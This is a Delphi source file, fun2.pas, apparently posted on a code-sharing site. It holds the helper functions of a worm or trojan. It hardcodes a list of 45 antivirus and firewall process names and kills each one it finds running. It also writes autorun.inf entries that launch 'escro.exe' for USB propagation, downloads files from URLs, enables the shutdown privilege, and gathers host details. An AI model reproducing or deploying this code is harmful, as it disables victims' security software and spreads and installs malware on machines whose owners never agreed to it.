📄 fun2.pas
字号:
unit fun2;
interface
uses
windows, messages, URLMon, WinSock, Sysutils, Classes, Tlhelp32, IniFiles;
const
VirS : array[0..44] of string =
('sc.exe', 'net.exe', 'sc1.exe', 'net1.exe', 'PFW.exe',
'Kav.exe', 'KVOL.exe', 'KVFW.exe', 'TBMon.exe', 'kav32.exe',
'kvwsc.exe', 'CCAPP.exe', 'EGHOST.exe', 'KRegEx.exe', 'kavsvc.exe', 'VPTray.exe',
'RAVMON.exe', 'KavPFW.exe', 'SHSTAT.exe', 'RavTask.exe', 'TrojDie.kxp', 'Iparmor.exe',
'MAILMON.exe', 'MCAGENT.exe', 'KAVPLUS.exe', 'RavMonD.exe', 'Rtvscan.exe', 'Nvsvc32.exe',
'KVMonXP.exe', 'Kvsrvxp.exe', 'CCenter.exe', 'KpopMon.exe', 'RfwMain.exe', 'KWATCHUI.exe',
'MCVSESCN.exe', 'MSKAGENT.exe', 'kvolself.exe', 'KVCenter.kxp', 'kavstart.exe', 'RAVTIMER.exe',
'RRfwMain.exe', 'FireTray.exe', 'UpdaterUI.exe', 'KVSrvXp_1.exe', 'RavService.exe');
function HostToIP(Name: string; var Ip: string): Boolean; //获得IP
function GetWinVersion: string; //获得系统版本
function GetFSize(PathName: string): Integer; //获得文件大小
function GetTmpPath: string; //获得临时文件夹路径
function GetSysPath: string; //获得系统文件夹路径
function GetUserName: string; //获得用户名
procedure AdjustToken(); //获取关机权限
function Dlf(SourceFile, DestFile: string): Boolean; //从网上下文件
procedure Writeinf(fn: string); //写INF文件
function FindProcess(ExeName: string): Longword; //寻找指定进程,返回其ID
procedure KillVir; //关闭杀毒软件
implementation
function HostToIP(Name: string; var Ip: string): Boolean;
var
wsdata : TWSAData;
hostName : array[0..255] of char;
hostEnt : PHostEnt;
addr : PChar;
begin
WSAStartup($0101, wsdata);
try
gethostname(hostName, SizeOf(hostName));
StrPCopy(hostName, Name);
hostEnt := gethostbyname(hostName);
if Assigned(hostEnt) then
if Assigned(hostEnt^.h_addr_list) then
begin
addr := hostEnt^.h_addr_list^;
if Assigned(addr) then
begin
Ip := Format('%d.%d.%d.%d', [Byte(addr[0]),
Byte(addr[1]), Byte(addr[2]), Byte(addr[3])]);
Result := true;
end
else
Result := false;
end
else
Result := false
else
begin
Result := false;
end;
finally
WSACleanup;
end;
end;
function GetWinVersion: string;
var
VersionInfo : TOSVersionInfo;
OSName : string;
begin
// set the size of the record
VersionInfo.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if windows.GetVersionEx(VersionInfo) then
begin
with VersionInfo do
begin
case dwPlatformId of
VER_PLATFORM_WIN32s: OSName := 'Win32s';
VER_PLATFORM_WIN32_WINDOWS: OSName := 'Windows 95';
VER_PLATFORM_WIN32_NT: OSName := 'Windows NT';
end; // case dwPlatformId
Result := OSName + ' Version ' + IntToStr(dwMajorVersion) +
'.' + IntToStr(dwMinorVersion) + #13#10' (Build ' +
IntToStr(dwBuildNumber)
+ ': ' + szCSDVersion + ')';
end; // with VersionInfo
end // if GetVersionEx
else
Result := '';
end;
function GetFSize(PathName: string): Integer;
{获取文件的长度}
var
f : TFileStream;
begin
f := TFileStream.Create(PathName, fmOpenRead or fmShareDenyNone);
Result := f.Size;
f.Free;
end;
function GetSysPath: string;
{获取系统目录}
var
sysdir : array[0..255] of char;
begin
GetSystemDirectory(sysdir, 255);
Result := sysdir;
end;
function GetTmpPath: string;
{获取临时目录}
var
tmpdir : array[0..255] of char;
begin
GetTempPath(255, @tmpdir);
Result := StrPas(tmpdir);
end;
function GetUserName: string;
{获取用户名}
var
buffer : array[0..MAX_COMPUTERNAME_LENGTH + 1] of char;
Size : Cardinal;
begin
Size := MAX_COMPUTERNAME_LENGTH + 1;
GetComputerName(@buffer, Size);
Result := StrPas(buffer);
end; { GetUserName }
procedure AdjustToken();
{设置关机权限}
var
hdlProcessHandle : Cardinal;
hdlTokenHandle : Cardinal;
tmpLuid : Int64;
//tkpPrivilegeCount: int64;
tkp : TOKEN_PRIVILEGES;
tkpNewButIgnored : TOKEN_PRIVILEGES;
lBufferNeeded : Cardinal;
Privilege : array[0..0] of _LUID_AND_ATTRIBUTES;
begin
hdlProcessHandle := GetCurrentProcess;
OpenProcessToken(hdlProcessHandle, (TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY),
hdlTokenHandle);
// Get the LUID for shutdown privilege.
LookupPrivilegeValue('', 'SeShutdownPrivilege', tmpLuid);
Privilege[0].Luid := tmpLuid;
Privilege[0].Attributes := SE_PRIVILEGE_ENABLED;
tkp.PrivilegeCount := 1; // One privilege to set
tkp.Privileges[0] := Privilege[0];
// Enable the shutdown privilege in the access token of this
// process.
AdjustTokenPrivileges(hdlTokenHandle,
false,
tkp,
SizeOf(tkpNewButIgnored),
tkpNewButIgnored,
lBufferNeeded);
end;
function Dlf(SourceFile, DestFile: string): Boolean;
{下载文件}
begin
try
Result := UrlDownloadToFile(nil, PChar(SourceFile), PChar(DestFile), 0, nil)
= 0;
except
Result := false;
end;
end;
procedure Writeinf(fn: string);
var
MyReg : TiniFile;
begin
Myreg:= TiniFile.Create(fn);
try
MyReg.WriteString('Autorun','open','escro.exe');
MyReg.WriteString('Autorun','shellexecute','escro.exe');
MyReg.WriteString('Autorun','shell\1','Open');
MyReg.WriteString('Autorun','shell\1\command','escro.exe');
finally
MyReg.Free;
end;
end;
procedure KillVir; //关闭杀毒软件
var
P : Longword;
i : Integer;
begin
for i := 0 to 44 do
begin
P := FindProcess(VirS[i]);
if P <> 0 then
TerminateProcess(OpenProcess(PROCESS_TERMINATE, False, P), $FFFFFFFF);
end;
end;
function FindProcess(ExeName: string): Longword; //寻找指定进程,返回其ID.
{(子函数)尾串是否匹配,不分大小写}
function AnsiEndsText(const ASubText, AText: string): Boolean;
var
P : PChar;
L, L2 : Integer;
begin
P := PChar(AText);
L := Length(ASubText);
L2 := Length(AText);
Inc(P, L2 - L);
if L > L2 then
Result := False
else
Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, P, L, PChar(ASubText), L) = 2;
end;
var
sphandle : DWORD;
Found : BOOL;
PStruct : TProcessEntry32;
begin
Result := 0;
sphandle := CreateToolhelp32Snapshot($00000002, 0);
PStruct.dwSize := SizeOf(PStruct);
Found := Process32First(sphandle, PStruct);
while Found do
begin
if AnsiEndsText(ExeName, PStruct.szExeFile) then
begin
Result := PStruct.th32ProcessID;
Break;
end;
Found := Process32Next(sphandle, PStruct);
end;
CloseHandle(sphandle);
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -